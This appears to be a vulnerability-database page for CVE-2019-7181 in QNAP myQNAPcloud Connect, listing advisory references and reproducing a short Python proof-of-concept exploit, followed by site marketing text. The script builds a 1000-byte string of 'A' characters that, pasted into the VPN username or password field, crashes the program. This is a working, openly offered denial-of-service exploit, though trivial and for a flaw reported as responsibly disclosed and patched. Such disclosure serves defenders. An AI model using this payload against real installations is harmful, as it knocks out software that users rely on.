| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| QNAP myQNAPcloud Connect 1.3.4.0317 Username/Password Denial Of Service Exploit | 20 Apr 201900:00 | – | zdt | |
| QNAP Systems QNAP myQNAPcloud Connect Denial of Service Vulnerability | 22 Apr 201900:00 | – | cnvd | |
| CVE-2019-7181 | 9 May 201914:57 | – | cve | |
| CVE-2019-7181 | 9 May 201914:57 | – | cvelist | |
| QNAP myQNAPcloud Connect 1.3.4.0317 - UsernamePassword Denial of Service | 22 Apr 201900:00 | – | exploitpack | |
| CVE-2019-7181 | 9 May 201915:29 | – | nvd | |
| CVE-2019-7181 | 9 May 201915:29 | – | osv | |
| QNAP myQNAPcloud Connect 1.3.4.0317 Username/Password Denial Of Service | 19 Apr 201900:00 | – | packetstorm | |
| Buffer overflow | 9 May 201915:29 | – | prion |
#!/usr/bin/python
# Exploit Title: QNAP myQNAPcloud Connect "Username/Password" DOS
# Date: 19/04/2019
# Exploit Author: Dino Covotsos - Telspace Systems
# Vendor Homepage: https://www.qnap.com
# Version: 1.3.4.0317 and below are vulnerable
# Software Link: https://www.qnap.com/en/utilities/essentials
# Contact: services[@]telspace.co.za
# Twitter: @telspacesystems (Greets to the Telspace Crew)
# Tested on: Windows XP/7/10 (version 1.3.3.0925)
# CVE: CVE-2019-7181
# POC
# 1.) Generate qnap.txt
# 2.) Copy the contents of qnap.txt to the clipboard
# 3.) Paste the contents in any username/password field(Add or Edit VPN)
# 4.) Click ok, program crashes.
# This vulnerability was responsibly disclosed February 3, 2019, new version has been released.
buffer = "A" * 1000
payload = buffer
try:
f=open("qnap.txt","w")
print "[+] Creating %s bytes QNAP payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation